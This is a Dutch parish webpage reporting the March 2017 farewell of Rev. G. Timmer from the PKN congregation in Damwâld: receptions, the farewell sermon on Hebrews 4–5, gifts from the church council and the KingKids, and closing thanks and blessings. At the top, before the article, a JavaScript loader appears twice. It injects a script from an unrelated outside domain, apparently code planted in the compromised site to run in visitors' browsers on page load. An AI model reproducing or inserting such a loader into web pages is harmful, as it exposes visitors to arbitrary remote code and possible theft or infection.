;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Afscheid ds. G. Timmer ... bedankt voor alles ! - PKN Damwâld

Afscheid ds. G. Timmer … bedankt voor alles !

Gepubliceerd op: zondag 26 maart 2017

Als je predikant gaat vertrekken om naar een andere standplaats te gaan, is dat voor een gemeente een ingrijpende zaak. Het vertrouwde, het geliefde, een stukje van de motor, die je gemeente “aandrijft”, gaat weg en wat krijgen we ervoor in de plaats? Een logische gedachte, die in deze periode in de hoofden van velen van ons speelt. Maar zo is het nu eenmaal, dominees zijn “voorbijgangers”, ze komen maar ze gaan ook weer.

Na bijna 6 jaar gaan ze Damwâld verlaten: dominee Timmer en zijn gezin. Zonder sentimenteel te worden is het toegestaan te constateren dat het vertrek van ‘onze dominee’ als een gemis zal worden gevoeld in de (hervormde-) kerkgemeenschap van Damwâld. Door de jaren heen immers heeft ds. Timmer zich laten gelden als een inspirerende en verbindende factor, voor jong en oud. Hij was meer, veel meer dan een doorsnee predikant en wie je er ook naar vraagt, hij of zij is louter positief. Na zes jaar inzet vol enthousiasme, creativiteit, inzet en toewijding gaat hij zich nu verder richten op zijn (parttime-) predikantschap in Twijzelerheide.

We wisten dat het er aan zat te komen, en dan opeens is het zover: het afscheid van de familie Timmer. Eerst dinsdag 14 maart tijdens het afscheid voor bewoners en omwonenden van senioren wooncentrum Nij Tjaerda en de afscheidsreceptie op 24 maart 2017 in activiteitencentrum ‘t Skûlplak. Geweldig dat zoveel mensen langs kwamen om ds. en mevrouw Timmer persoonlijk de hand te drukken. Beide gelegenheden werden drukbezocht en er waren veel goede contacten, lovende en warme woorden. Vergezeld van een prachtige speech bood voorzitter van de kerkenraad Wytze Postma de familie Timmer een aantal passende cadeaus aan. Ook de KingKids ‘trakteerden’ de familie Timmer op een aantal verrassingen.

Zondagmorgen 26 maart vond de afscheidsdienst plaats. Ds. Timmer preekte uit Hebreeën 4: 14 t/m 5: 10. De preek met als thema “De tijd is verzet” ging over, hoe kan het anders, de wisseling van de winter- naar de zomertijd in relatie tot het afscheid en de veertigdagentijd. In het licht van Pasen heeft Jezus als onze Hoge Priester ook voor ons de tijd verzet, waardoor wij – ook nu wij als gemeente en predikant afscheid van elkaar moeten nemen – een hoopvolle toekomst hebben.  Ook konden de vele aanwezigen genieten van een prachtige bijdrage van de KingKids, waarbij de kinderen van het predikantsechtpaar in het zonnetje werden gezet. Zoals het bij het ‘afscheid’ van de KingKids normaal gesproken altijd de gewoonte is, kregen Jan, Niels, Anna en Vera, naast elk een leuk presentje, ieder een passende Bijbeltekst mee. Vervolgens kreeg de voorzitter van de kerkenraad, Wytze Postma, het woord. Hij bedankte ds. Timmer namens de gemeente voor alles wat hij in de afgelopen zes jaar heeft gedaan en bereikt, binnen en buiten de kerkmuren. Ds. Timmer bedankte op zijn beurt de gemeente voor het vertrouwen, de vriendschap en de genegenheid die hij en zijn gezin in de afgelopen zes jaar mochten ontvangen.

Wij willen de familie Timmer heel hartelijk bedanken dat ze als trouwe reisgenoten zes jaar lang met ons wilden optrekken! Dat heeft de gemeente gebouwd en is velen tot grote zegen geweest. Als God ons leidt geeft dat vertrouwen voor de toekomst, ook als wij als gemeente en predikant afscheid van elkaar nemen. Heel veel dank voor alles wat u heeft gegeven en wat we met elkaar onderweg mochten delen aan inspiratie en geloof.
Allemaal zijn we op weg, op reis door het leven. Op die tocht ontmoet je mensen, je trekt samen op en je neemt weer afscheid. Terugkijkend kunnen we de weg zien die God met ons is gegaan, vooruitkijkend vertrouwen we erop dat Hij ons ook de juiste weg wil wijzen. Wij zijn er ons terdege van bewust dat we de volgende stap niet zonder Gods leiding kunnen zetten en hopen dan ook dat we elkaar in onze gebeden willen blijven gedenken. Ga met God en Hij zal met je zijn tot wij weer elkaar ontmoeten… Gods zegen bij de nieuwe taak die voor u ligt. In Christus verbonden.